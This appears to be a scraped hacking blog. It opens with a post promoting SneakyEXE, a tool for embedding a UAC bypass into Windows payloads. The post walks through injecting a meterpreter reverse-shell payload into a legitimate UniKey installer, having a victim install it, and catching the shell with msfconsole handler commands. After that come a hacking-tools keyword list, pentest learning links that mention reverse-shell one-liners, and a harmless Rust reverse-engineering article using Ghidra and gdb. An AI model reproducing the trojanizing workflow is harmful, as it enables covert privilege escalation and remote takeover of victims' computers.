Sunday, 30 August 2020

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SneakyEXE: An "UAC-Bypassing" Codes Embedding Tool For Your Win32 Payload

About SneakyEXE
   SneakyEXE is a tool which helps you embedding a UAC-Bypassing function into your custom Win32 payloads (x86_64 architecture specifically).

   SneakyEXE was tested on:
  • Windows 7, 8, 10 (64 bit)
  • Parrot Security OS 4.7

   Requirements of SneakyEXE:
  • For Linux:   Architecture: Optional
       Python 3.7.x: Yes
       Module: termcolor
       Distro: Any
       Distro version: Any
  • For Windows:   Architecture: x86_64
       Python 3.7.x: No
       Module: No
       Windows version: 7, 8, 10

SneakyEXE's Installtion for Linux
   You must install Python 3 first:
  • For Debian-based distros: sudo apt install python3
  • For Arch Linux based distros: sudo pacman -S python3
   And then, open your Terminal and enter these commands:

SneakyEXE's Installtion for Windows
  • Download SneakEXE-master zip file.
  • Unzip it into your optional directory.
  • Change dir to \SneakyEXE\Win32\.
  • Execute sneakyexe.exe (or sys\sneakyexe.exe for an improved startup speed).
  • (Optional : you can copy sneakyexe.exe to whatever directory you want and delete the unzipped one)
   NOTE: The payload can only be successfully executed by the user with Administrator privilege. Users with limited token wouldn't succeed.

SneakyEXE GUI verion installation for Windows
   You must install Python 3 first. Download and run Python 3.7.x setup file from On Install Python 3.7, enable Add Python 3.7 to PATH.
   Download SneakEXE-master zip file and unzip it.
   And then, open PowerShell or CMD on SneakyEXE folder where you have just unzipped SneakyEXE-master and enter these command:

pip install pillow
pip install pyinstaller
mkdir compile
cd compile
pyinstaller --windowed --onefile --icon=Icon.ico /source/Win32/
cd dist

How to use SneakyEXE?

   I dowloaded Unikey from
   And then, i used msfvenom to inject payload to UniKeyNT.exe (payload used: windows/meterpreter/reverse_tcp). I called the payload file is uNiKeY.exe.

   After that, to embed UAC-Bypassing codes to uNiKeY.exe, i used this command:
python3 sneakyexe bin=/home/hildathedev/uNiKeY.exe out=/home/hildathedev/SneakyEXE

  And then, by some how, makes your victim installs the payload that was embedded UAC-Bypassing codes and enter these commands:

sudo msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Your IP address>
set LHOST <Your port>

   and wait...

  • This tool was made for academic purposes or ethical cases only. I ain't taking any resposibility upon your actions if you abuse this tool for any black-hat acitivity
  • Feel free to use this project in your software, just don't reclaim the ownerhsip.

Credits: This tool does embed UACme which was originally coded by hfiref0x but the rest was pretty much all coded by me (Zenix Blurryface).

Author: Copyright © 2019 by Zenix Blurryface.

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  127. Pentest Tools Framework
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  129. Hackrf Tools
  130. Hacking Tools For Beginners
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  138. Pentest Tools Windows
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  140. Github Hacking Tools
  141. Bluetooth Hacking Tools Kali
  142. Pentest Tools Download
  143. Pentest Tools Bluekeep
  144. Tools Used For Hacking
  145. Pentest Tools Android
  146. Nsa Hack Tools
  147. Best Hacking Tools 2020
  148. Hacking Tools Hardware
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  150. Hack Tools Pc
  151. Growth Hacker Tools
  152. Hacks And Tools
  153. Hacks And Tools
  154. Pentest Recon Tools

Learning Resources For Hacking And Pentesting

In this article, I'm going to provide you a list of resources which I have found very useful. I don't remember all of them from top of my head so I might miss some. This list will be updated on usual basis. Hope you'll find some good stuff to learn. If you have got suggestions leave them down below in the comments section.

Free Hands on Labs:

1. Hack The Box - live machines to hack your way around. Besides boxes they have awesome challenges and great labs to try out.
2. TryHackMe - great way to learn pentesting while doing it. Lots of machines to hack and lots of ground to cover.
3. Portswigger Web Security Academy - learn web application pentesting.

Free Training (Mostly Introductory stuff):

1. Tenable University - training and certification on Nessus etc.
2. Palo Alto Networks - Palo Alto Networks offers an abundance of resources to prepare for there certifications. The training is free but the exams cost.
3. Open P-TECH - has an introductory course on Cybersecurity Fundamentals.
4. IBM Security Learning Academy - has many courses but focused on IBM security services and 
5. Cisco Networking Academy - not all courses are free but Introduction to Cybersecurity and Cybersecurity Essentials are free.
6. AWS Training and Certification - has some free cloud security training courses.
7. Metasploit Unleashed - Free Online Ethical Hacking Course - Offensive Security's free online course on metasploit.
8. Coursera and Edx - you already know about them.


1. HackTricks - This is simply an awesome blog just visit it and you'll fall in love.
2. pentestmonkey - I visit it most of the time for one-liner reverse shells they are awesome.


1. 0xdf


1. ippsec - an awesome YouTube channel with tons of information in every video. New video comes out weekly as soon as the machine on hackthebox expires. for video searching
2. xct - short walkthroughs on hackthebox machines.
3. Cristi Vlad - advice and content on pentesting and python.
4. LiveOverflow - reverse engineering on steroids.
5. SANS Pen Test Training - SANS institute webinars and talks.
6. VbScrub - great pentesting videos.
7. BinaryAdventure - great pentesting and reverse engineering videos.
8. GynvaelEN - great videos and talks about CTFs and pentesting.

GitHub Repos:

1. PayloadsAllTheThings - heaven of hackers.
2. Pentest Monkey - reverse shells and more.

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Saturday, 29 August 2020

Reversing Rust String And Str Datatypes

Lets build an app that uses several data-types in order to see how is stored from a low level perspective.

Rust string data-types

The two first main objects are "str" and String, lets check also the constructors.

Imports and functions

Even such a basic program links several libraries and occupy 2,568Kb,  it's really not using the imports and expots the runtime functions even the main. 

Even a simple string operation needs 544 functions on rust:

Main function

If you expected see a clear main function I regret to say that rust doesn't seem a real low-level language In spite of having a full control of the memory.

Ghidra turns crazy when tries to do the recursive parsing of the rust code, and finally we have the libc _start function, the endless loop after main is the way Ghidra decompiles the HLT instruction.

If we jump to main, we see a function call, the first parameter is rust_main as I named it below:

If we search "hello world" on the Defined Strings sections, matches at the end of a large string

After doing "clear code bytes" we can see the string and the reference:

We can see that the literal is stored in an non null terminated string, or most likely an array of bytes. we have a bunch of byte arrays and pointed from the code to the beginning.
Let's follow the ref.  [ctrl]+[shift]+[f] and we got the references that points to the rust main function.

After several naming thanks to the Ghidra comments that identify the rust runtime functions, the rust main looks more understandable.
See below the ref to "hello world" that is passed to the string allocated hard-coding the size, because is non-null terminated string and there is no way to size this, this also helps to the rust performance, and avoid the c/c++ problems when you forgot the write the null byte for example miscalculating the size on a memcpy.

Regarding the string object, the allocator internals will reveal the structure in static.
alloc_string function call a function that calls a function that calls a function and so on, so this is the stack (also on static using the Ghidra code comments)

1. _$LT$alloc..string..String$u20$as$u20$core..convert..From$LT$$RF$str$GT$$GT$::from::h752d6ce1f15e4125
2. alloc::str::_$LT$impl$u20$alloc..borrow..ToOwned$u20$for$u20$str$GT$::to_owned::h649c495e0f441934
3. alloc::slice::_$LT$impl$u20$alloc..borrow..ToOwned$u20$for$u20$$u5b$T$u5d$$GT$::to_owned::h1eac45d28
4. alloc::slice::_$LT$impl$u20$$u5b$T$u5d$$GT$::to_vec::h25257986b8057640
5. alloc::slice::hack::to_vec::h37a40daa915357ad
6. core::slice::_$LT$impl$u20$$u5b$T$u5d$$GT$::len::h2af5e6c76291f524
7. alloc::vec::Vec$LT$T$GT$::extend_from_slice::h190290413e8e57a2
8. _$LT$alloc..vec..Vec$LT$T$GT$$u20$as$u20$alloc..vec..SpecExtend$LT$$RF$T$C$core..slice..Iter$LT$T$GT$$GT$$GT$::spec_extend::h451c2f92a49f9caa

Well I'm not gonna talk about the performance impact on stack but really to program well reusing code grants the maintainability and its good, and I'm sure that the rust developed had measured that and don't compensate to hardcode directly every constructor.

At this point we have two options, check the rust source code, or try to figure out the string object in dynamic with gdb.

Source code

Let's explain this group of substructures having rust source code in the hand.
The string object is defined at and it's simply an u8 type vector.

And the definition of vector can be found at  and is composed by a raw vector an the len which is the usize datatype.

The RawVector is a struct that helds the pointer to the null terminated string stored on an Unique object, and also contains the allocation pointer, here definition.

The cap field is the capacity of the allocation and a is the allocator:

Finally the Unique object structure contains a pointer to the null terminated string, and also a one byte marker core::marker::PhantomData

Dynamic analysis

The first parameter of the constructor is the interesting one, and in x64 arch is on RDI register, the extrange sequence RDI,RSI,RDX,RCX it sounds like ACDC with a bit of imagination (di-si-d-c)

So the RDI parámeter is the pointer to the string object:

So RDI contains the stack address pointer that points the the heap address 0x5578f030.
Remember to disable ASLR to correlate the addresses with Ghidra, there is also a plugin to do the synchronization.

Having symbols we can do:
p mystring

and we get the following structure:

String::String {
  vec: alloc::vec::Vec {
    buf: alloc::raw_vec::RawVec {
      ptr: core::ptr::unique::Unique {
        pointer: 0x555555790130 "hello world\000",
        _marker: core::marker::PhantomData
     cap: 11,
     a: alloc::alloc::Global
   len: 11

If the binary was compiled with symbols we can walk the substructures in this way:

(gdb) p mystring.vec.buf.ptr
$6 = core::ptr::unique::Unique {pointer: 0x555555790130 "hello world\000", _marker: core::marker::PhantomData}

(gdb) p mystring.vec.len

$8 = 11

If we try to get the pointer of each substructure we would find out that the the pointer is the same:

If we look at this pointer, we have two dwords that are the pointer to the null terminated string, and also 0xb which is the size, this structure is a vector.

The pionter to the c string is 0x555555790130

This seems the c++ string but, let's look a bit deeper:

  (gdb) x/wx 0x7fffffffdf50
  0x7fffffffdf50: 0x55790130  -> low dword c string pointer
  0x7fffffffdf54: 0x00005555  -> hight dword c string pointer
  0x7fffffffdf58: 0x0000000b  -> len

0x7fffffffdf5c: 0x00000000
0x7fffffffdf60: 0x0000000b  -> low cap (capacity)
0x7fffffffdf64: 0x00000000  -> hight cap
0x7fffffffdf68: 0xf722fe27  -> low a  (allocator)
0x7fffffffdf6c: 0x00007fff  -> hight a
0x7fffffffdf70: 0x00000005 

So in this case the whole object is in stack except the null-terminated string.

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